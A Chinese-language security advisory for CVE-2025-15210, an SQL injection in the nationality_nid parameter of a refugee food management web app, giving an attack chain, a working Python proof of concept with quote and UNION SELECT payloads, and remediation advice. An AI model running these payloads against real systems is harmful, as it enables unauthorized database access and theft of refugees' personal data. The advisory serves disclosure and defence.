CVE-2025-15210: Refugee Food Management System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15210

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Refugee Food Management System 1.0

漏洞概述

CVE-2025-15210是code-projects平台上Refugee Food Management System 1.0版本中的一个高危安全漏洞。该系统是一款用于管理难民食物分配的Web应用，在处理用户输入时存在严重的SQL注入缺陷。漏洞出现在editrefugee.php文件中的nationality_nid参数，攻击者可以通过构造恶意SQL语句实现对数据库的未授权访问和操作。由于该漏洞可通过远程网络利用，且只需要低权限账户即可发起攻击，因此具有较高的实际威胁性。攻击者成功利用此漏洞后，可以窃取敏感数据、修改数据库内容，甚至在某些配置下可能实现服务器远程代码执行。该漏洞已在2025年12月30日被公开披露，漏洞利用代码（PoC）已在互联网公开，强烈建议用户立即采取防护措施。

技术细节

该SQL注入漏洞位于Refugee Food Management System 1.0的/home/editrefugee.php文件中的nationality_nid参数。系统在处理用户提交的nationality_nid参数时，直接将用户输入拼接到SQL查询语句中，未进行充分的输入验证和参数化查询处理。攻击者可以利用UNION SELECT、布尔盲注、时间盲注等技术手段提取数据库中的敏感信息。典型的攻击payload包括在nationality_nid参数中注入SQL语句，如使用单引号(')触发SQL语法错误，或使用UNION语句联合查询获取数据库版本、当前用户、数据库名称等信息。由于系统对输入过滤不严，攻击者可以绕过前端验证直接发送恶意请求。该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L，表明攻击复杂度低、权限要求低、无需用户交互即可实现攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标系统为Refugee Food Management System 1.0，并定位到存在漏洞的页面/home/editrefugee.php

STEP 2

步骤2: 漏洞探测

攻击者使用SQL注入测试字符（如单引号'）探测nationality_nid参数，确认是否存在SQL注入漏洞

STEP 3

步骤3: 构建恶意Payload

根据数据库类型（MySQL/MSSQL），构造UNION SELECT、时间盲注或布尔盲注等SQL语句

STEP 4

步骤4: 数据提取

通过注入的SQL语句提取数据库中的敏感信息，包括用户凭证、配置文件、难民个人信息等

STEP 5

步骤5: 权限提升

在某些情况下，攻击者可能利用SQL注入获取数据库管理员权限，进而控制整个服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15210 SQL Injection PoC
# Target: Refugee Food Management System 1.0
# File: /home/editrefugee.php
# Parameter: nationality_nid

import requests
import sys

target_url = "http://target.com/home/editrefugee.php"

# Basic SQL Injection test - detect vulnerability
def test_basic_injection():
    payload = "'"
    params = {
        "a": "1",
        "b": "2",
        "c": "3",
        "sex": "male",
        "d": "4",
        "e": "5",
        "nationality_nid": payload
    }
    try:
        response = requests.get(target_url, params=params, timeout=10)
        if "sql" in response.text.lower() or response.status_code == 500:
            print("[+] Vulnerability detected!")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# UNION-based injection to extract database info
def extract_database_info():
    # Payload to get database version and name
    payload = "' UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12-- -"
    params = {
        "a": "1",
        "b": "2",
        "c": "3",
        "sex": "male",
        "d": "4",
        "e": "5",
        "nationality_nid": payload
    }
    try:
        response = requests.get(target_url, params=params, timeout=10)
        if response.status_code == 200:
            print("[+] Database information extracted")
            print(response.text[:500])
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("CVE-2025-15210 SQL Injection PoC")
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    test_basic_injection()
    extract_database_info()

影响范围

Refugee Food Management System 1.0

防御指南

临时缓解措施

立即停止使用受影响版本的Refugee Food Management System，或在web应用防火墙中添加针对SQL注入的防护规则。临时措施包括：对nationality_nid等参数实施严格的输入验证，过滤SQL关键字和特殊字符（如单引号、双引号、分号等），限制数据库用户的权限。最根本的解决方案是等待官方发布安全补丁，或自行修复editrefugee.php文件中的SQL查询逻辑，使用参数化查询替代字符串拼接。